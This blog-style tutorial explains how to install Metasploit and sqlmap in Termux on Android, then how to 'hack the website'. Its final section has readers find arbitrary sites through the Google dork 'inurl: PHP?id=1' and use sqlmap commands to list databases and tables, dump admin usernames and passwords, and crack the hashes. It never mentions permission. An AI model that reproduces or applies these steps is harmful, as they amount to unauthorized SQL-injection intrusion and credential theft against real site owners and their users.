TERMUX-TERMINAL -6

Need SuperUser

https://download.chainfire.eu/696/supersu/

How to Install Metasploit in Termux

Install MetaSploit in termux
Open your Termux and upgrade your repositories by using the following command.


pkg update && pkg upgrade -y


Now install the unstable repository by running this command.

pkg install unstable-repo


Use the below Termux command to Install the Metasploit in your Termux.

pkg install metasploit


The installation process may take some time because Termux will install other packages automatically that are required to run Metasploit, such as Ruby, BisonFTP, etc. Do not close the Termux session until the installation is completed. 


Run the Metasploit 
After the installation process is complete, you can now run and use the Metasploit framework on your Android device via the Termux. Type the below command to run the Metasploit in Termux.


msfconsole




For the first time, it will take a bit of time to load because the Metasploit is initializing the database for the first time, so wait patiently for the process to finish.


Tip: If you are not running Metasploit for the first time, make sure the PostgreSQL database is running. So that your Metasploit runs more smoothly and quickly.


Make sure Postgresql is working.
The Postgresql database is used by Metasploit as its database. This database is used to speed up the execution process of the commands that you type in Metasploit. Metasploit can run without Postgresql, but the problem is you will get a late response.


Make sure to run Postgresql before running the Metasploit. To check whether Postgresql is running or not, you can use the following command.


pg_ctl -D $PREFIX/var/lib/Postgresql status


You will get the following output if Postgresql is already running.


pg_ctl: server is running (PID: 9023 ) /data/data/com.termux/files/usr/bin/postgres “-D” “/data/data/com.termux/files/usr/var/lib/postgresql”


You will get the following output if Postgresql is not running.

pg_ctl: no server running


Now let’s see how to start PostgreSQL.


Use the following command to start the PostgreSQL.


pg_ctl -D $PREFIX/var/lib/postgresql start


Use the following command to stop the PostgreSQL.


pg_ctl -D $PREFIX/var/lib/postgresql stop


If you face any problem in installing Metasploit in Termux. Then here is the video from our YouTube channel on how to install Metasploit Framework in Termux.





Do you want to get more Termux packages? Then check the list of best Termux packages.


Method 2: How to install Metasploit in Termux using Github
This is the second method on how to install Metasploit in Termux using Github. To install Metasploit in Termux using GitHub, please follow the below mention step carefully. And after typing each command, you must wait until the command gets executed.


In the first step, we have to update our Termux repository. Simply use the below command to update the Termux repository.


pkg update && pkg upgrade -y


After updating the Termux repository, our next step is to install some requirements for the Metasploit.

pkg install wget curl openssh git -y

By using the above command, we have installed the following packages: Wget, Curl, Openssh, and git.


Type the below command in your termux to install ncurses-utils

apt install ncurses-utils


Copy the below command and paste it into your Termux to download Metasploit.

wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh


Use the below command to make the file read, write, and executable.


chmod +x metasploit.sh


Type the below command to run the Metasploit.

./metasploit.sh


If the above command does not work, then try the below command.

bash metasploit.sh


Metasploit has been successfully installed in your Termux.

How to install and use SQLMAP in Termux

How to install sqlmap in Termux

First We are going to update the package list with the command:
apt update
Now we have to install Python with the following command:
apt install python python2
Wait until python is installed. After installing python we will install git. Git will help you to clone the package.
apt install git
After installing git we are going to clone the SQLMAP package into our directory with the help of the git command.
git clone https://github.com/sqlmapproject/sqlmap
Wait for the process to be finished. As the process is finished now we need to enter the tool directory with the following command.
cd sqlmap
Now we need to give them permission to read-write and execute the SQLMAP python file by using the command:
chmod +x sqlmap.py
After that, you need to run the following command to run the SQLMAP
python2 sqlmap.py
Now SQLMAP is successfully installed on your Termux. 
If you want to run SQLMAP again next time then you need to launch the Termux then you need to enter the directory of SQLMAP by typing the following command cd sqlmap. And then you need to run the SQLMAP by using the following command python2 sqlmap.py.

Now let’s see how to hack the website using SQLMAP

First, let me tell you. You can hack the websites that have SQL injection vulnerability.
Now you might be thinking about how to find a website that has SQL injection vulnerability. 
You can use google dorks to find out SQL injection vulnerability in the website.
Most of the website have SQL injection vulnerability start with PHP?id=1 or any kind of value which is present after PHP?id=
To find the vulnerable websites you can use this google dork inurl: PHP?id=1 or any value after PHP?id=
You can find more information about Google dorks here: Google hacking
Type the following command:
This command will help you to find out the database of the website
python2 sqlmap.py -u <your website> –dbs
If the website is vulnerable then you will found the output similar to this:
*Information_schema*Database
Now our next step is to find tables that are present in the database with the following command
python2 sqlmap.py -u <your website> –D Database –tables
The above command tells Sqlmap to find out tables that are present under the database.
Note: You will see information schema don’t waste your time in finding credentials or any juicy information in that schema because information schema is of no use.
After running the above command you will see tables something like this.

*id
*users
*admin

Now our next step is to find columns under the table admin.

python2 sqlmap.py -u <your website> -D Database -T admin –columns

The above command tells Sqlmap to find out columns under the table admin.
Now let’s move on to our final command.

For example, you found the username and password under the column. Now we need to dump the username and password in text format in your android.

python2 sqlmap.py -u <your website> -D Database -T admin -C username, password –dump

The above command will save the username and password in the text format on your device.

The password may be in an encrypted form such as md5 most of the passwords are in text form. If the password is encrypted then you need to decrypt the password using findmyhash or any other program which is used to decrypt the password.

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.